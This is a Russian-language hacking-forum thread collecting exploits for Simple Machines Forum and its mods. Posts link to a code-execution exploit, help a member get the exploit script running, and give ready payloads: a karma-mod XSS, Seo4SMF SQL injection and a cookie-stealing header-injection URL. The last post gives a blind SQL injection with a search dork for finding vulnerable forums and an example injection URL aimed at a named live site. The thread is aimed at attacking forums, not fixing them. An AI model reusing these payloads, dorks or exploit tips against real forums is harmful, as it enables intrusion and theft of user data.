HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.11.2008, 20:46
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию

Simple Machines Forum <= 1.1.6 Code Execution (LFI)
Автор:~elmysterio ( a.k.a us )

Локальный инклуд раннее загруженного атачмента с расширением .gif, содержащим шелл

http://milw0rm.com/exploits/7011
 
Ответить с цитированием

  #2  
Старый 05.11.2009, 21:21
dolmatian
Новичок
Регистрация: 04.11.2009
Сообщений: 2
С нами: 8693233

Репутация: 4
По умолчанию

Цитата:
Сообщение от [Raz0r]  
Simple Machines Forum <= 1.1.6 Code Execution (LFI)
Автор:~elmysterio ( a.k.a us )

Локальный инклуд раннее загруженного атачмента с расширением .gif, содержащим шелл

http://milw0rm.com/exploits/7011
можно обойти ограничение на magic_quotes_gpc OFF
если для изменения параметра theme_dir использовать POST запрос к Profile.php
 
Ответить с цитированием

  #3  
Старый 08.11.2008, 18:58
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

SMF <= 1.1.6 Karma Description Mod XSS
Код:
<script>alert(/XSS/)</script>
Автор: mailbrush (Я)
Не фильтрируется поле "За что" в моде кармы.

Последний раз редактировалось mailbrush; 21.11.2008 в 12:02..
 
Ответить с цитированием

  #4  
Старый 11.11.2008, 20:26
yaotzin
Новичок
Регистрация: 06.12.2005
Сообщений: 4
С нами: 10751748

Репутация: 0
По умолчанию

нехтит

Цитата:
# Logged in as yaotzin
# Waiting 5 secs (flood control)
PHP Notice: Use of undefined constant frmdt_filename - assumed 'frmdt_filename'
in D:\PHP\php5.2.6\exploit.php on line 310
PHP Notice: Use of undefined constant frmdt_type - assumed 'frmdt_type' in D:\P
HP\php5.2.6\exploit.php on line 311
PHP Notice: Use of undefined constant frmdt_content - assumed 'frmdt_content' i
n D:\PHP\php5.2.6\exploit.php on line 312
PHP Notice: Use of undefined constant frmdt_url - assumed 'frmdt_url' in D:\PHP
\php5.2.6\exploit.php on line 1263
PHP Notice: Use of undefined constant frmdt_boundary - assumed 'frmdt_boundary'
in D:\PHP\php5.2.6\exploit.php on line 1267
PHP Notice: Use of undefined constant frmdt_filename - assumed 'frmdt_filename'
in D:\PHP\php5.2.6\exploit.php on line 1285
PHP Notice: Use of undefined constant frmdt_type - assumed 'frmdt_type' in D:\P
HP\php5.2.6\exploit.php on line 1287
PHP Notice: Use of undefined constant frmdt_type - assumed 'frmdt_type' in D:\P
HP\php5.2.6\exploit.php on line 1288
PHP Notice: Use of undefined constant frmdt_transfert - assumed 'frmdt_transfer
t' in D:\PHP\php5.2.6\exploit.php on line 1290
PHP Notice: Use of undefined constant frmdt_content - assumed 'frmdt_content' i
n D:\PHP\php5.2.6\exploit.php on line 1293
# Error while posting
# Try augmenting -wait parameter
#

D:\PHP\php5.2.6>
 
Ответить с цитированием

  #5  
Старый 12.11.2008, 05:38
Rashid
Познающий
Регистрация: 31.01.2008
Сообщений: 46
С нами: 9619132

Репутация: 8
По умолчанию

to yaotzin
в рнр.ini
error_reporting = E_ALL & ~E_NOTICE
запускать сплойт с параметром -wait 10
 
Ответить с цитированием

  #6  
Старый 12.11.2008, 05:56
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами: 10018169

Репутация: 1680


По умолчанию

Цель: Simple Machines Forum (SMF) 1.1.6 и более ранние версии
Воздействие: Выполнение произвольных команд
Код эксплоита: http://www.securitylab.ru/bitrix/exturl.php?goto=%2Fpoc%2Fextra%2F362535.php
 
Ответить с цитированием

  #7  
Старый 13.11.2008, 00:31
piton
Новичок
Регистрация: 14.09.2006
Сообщений: 17
С нами: 10344701

Репутация: 0
По умолчанию

Цитата:
Сообщение от Nightmarе  
Цель: Simple Machines Forum (SMF) 1.1.6 и более ранние версии
Воздействие: Выполнение произвольных команд
Код эксплоита: http://www.securitylab.ru/bitrix/exturl.php?goto=%2Fpoc%2Fextra%2F362535.php
Не работает =(
[!!] Wrong username/password
юзер валидный но всеравно не работает (

Последний раз редактировалось piton; 13.11.2008 в 00:35..
 
Ответить с цитированием

  #8  
Старый 04.01.2009, 01:07
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
С нами: 10061666

Репутация: 2438
По умолчанию

http://milw0rm.com/exploits/7011


СМФ имеет функцию изменения тем,так вот это уязвимость заключается в изменении настроек тем,а затем присвоения значение $ параметрам конфигурации,так что вы можете изменять настройки смф

Итак:
Sources/Themes.php

249 в index.php:

Код:
'jsoption' => array('Themes.php', 'SetJavaScript')

1185 в Sources/Themes.php

Код:
function SetJavaScript()
Затем эта функция выделяет темы в таблице переменных, которые вы послали

1205 в Sources/Themes.php
Код:
	db_query("
		REPLACE INTO {$db_prefix}themes
			(ID_THEME, ID_MEMBER, variable, value)
		VALUES ($settings[theme_id], $ID_MEMBER, SUBSTRING('$_GET[var]', 1, 255), SUBSTRING('" . (is_array($_GET['val']) ? implode(',', $_GET['val']) : $_GET['val']) . "', 1, 65534))", __FILE__, __LINE__);
Зaтем считывает одну и ту же инфу тем же методом:

Код:
$request = db_query("
			SELECT ID_THEME, variable, value
			FROM {$db_prefix}themes
			WHERE variable IN ('name', 'theme_url', 'theme_dir', 'images_url')" . (empty($modSettings['theme_default']) && !allowedTo('admin_forum') ? "
				AND ID_THEME IN ('$knownThemes')
				AND ID_THEME != 1" : '') . "
				AND ID_THEME != 0
			LIMIT " . count(explode(',', $modSettings['knownThemes'])) * 8, __FILE__, __LINE__);
861 в Sources/Themes.php

Код:
while ($row = mysql_fetch_assoc($request))
Параметры в $context['available_themes'][TEMA]

869 в Sources/Themes.php

Код:
$context['available_themes'][$row['ID_THEME']][$row['variable']] = $row['value'];
Затем принимает информацию по пунктам:

904 в Sources/Themes.php

Код:
foreach ($context['available_themes'] as $ID_THEME => $theme_data)
И в настройки перменные принимают значения,который мы только что изменили

910 в Sources/Themes.php


Код:
$settings = $theme_data;
И в конце концов, в том числе файл, использует значение $ theme_dir
Код:
include($settings['theme_dir'] . '/languages/Settings.' . $user_info['language'] . '.php')
 
Ответить с цитированием

  #9  
Старый 09.01.2009, 21:49
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
С нами: 10061666

Репутация: 2438
По умолчанию

Уязвимости в модуле Seo4SMF

SQL Иньекции:

Файл: seo4smf-redirect.php

Куски уязвимого кода:


Line 7-13
Код:
$topic = $_GET['t'];
$board = $_GET['b'];
$other = $_GET['o'];
$user = $_GET['u'];
$tpage = $_GET['p'];
$action = $_GET['a'];
$param = $_GET['param'];
Line 50-63
Код:
$query = db_query("
SELECT m.ID_TOPIC, m.subject ,b.ID_BOARD, b.name
FROM {$db_prefix}messages AS m, {$db_prefix}boards AS b
WHERE m.ID_TOPIC = $topic
AND m.ID_BOARD = b.ID_BOARD
IMIT 1", __FILE__, __LINE__);
Line 105-108
Код:
$query = db_query("
SELECT name FROM {$db_prefix}boards AS b
WHERE ID_BOARD = $board
LIMIT 1", __FILE__, __LINE__);
Line 125
Код:
$request = db_query("SELECT memberName FROM {$db_prefix}members where
ID_MEMBER=".$user." limit 1", __FILE__, __LINE__);
Line 143
Код:
$request = db_query("SELECT subject FROM {$db_prefix}tp_articles where
id=".$tpage." limit 1", __FILE__, __LINE__);
Переменные не содержат никакие фильтры,поэтому можно провести Sql иньекцию.

Код:
http://site/smf/seo4smf-redirect.php?t=-1 union select 1,2,3...,concat(username(),database()) –

XSS:



Файл: seo4smf-redirect.php

Кусок уязвимого кода:
Код:
if(!empty($url)){
 header('HTTP/1.1 301 Moved Permanently');
 header('Location: '.$url);
 exit;
}
Код:
http://site/seo4smf-redirect.php?a=x%0DLocation:%20javascript:alert(document.cookie);

Последний раз редактировалось baltazar; 28.01.2009 в 17:58..
 
Ответить с цитированием

Member Awards 1.02 Blind SQL-Injection
  #10  
Старый 13.06.2009, 17:53
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию Member Awards 1.02 Blind SQL-Injection

Blind SQL-Инъекция в моде Member Awards
Автор: mailbrush
Часть уязвимого кода (ManageAwards.php):
PHP код:
        // Load single award ifo for editing.
        
$request db_query("
            SELECT ID_AWARD, awardName, gameName, timeAdded, filename, width, height
            FROM 
{$db_prefix}awards
            WHERE ID_AWARD = 
$_REQUEST[id]
            LIMIT 1"
__FILE____LINE__); 
Уязвимость позволяет удаленному пользователю выполнить произвольные запросы в базу. Уязвимость существует в передаваемом параметре id.

Дорк:
Код:
inurl:index.php?action=profile;sa=awardsMembers;id=1
На многих найденных форумах, вместо награды будет сообщение
Цитата:
The user whose profile you are trying to view does not exist.
Оно возникает потому что удалённый пользователь не выбрал пользователя для просмотра, что есть обязаным для SMF. Решается это простоым добавлением id любого пользователя -
Код:
http://evilsite.com/smf/index.php?action=profile;sa=awardsMembers;u=1;id=1
Пример:
Код:
http://forum.rockmanpm.com/index.php?action=profile;sa=awardsMembers;u=1;id=1+and+substring(version(),1)=5
Способ обхода фильтра и эксплуатации уязвимости:

https://forum.antichat.ru/showpost.p...postcount=7592
https://forum.antichat.ru/threadnav46016-759-10.html

Последний раз редактировалось Grey; 14.06.2009 в 18:28..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Уязвимости CMS / форумов 167 17.10.2019 18:14
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48
Уязвимость в Simple machines smf 1.0 beta 5 public Nemirof Уязвимости CMS / форумов 0 23.10.2004 00:47
Вопрос про уязвимости в Simple machines forum Уязвимости CMS / форумов 4 27.08.2004 14:09



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.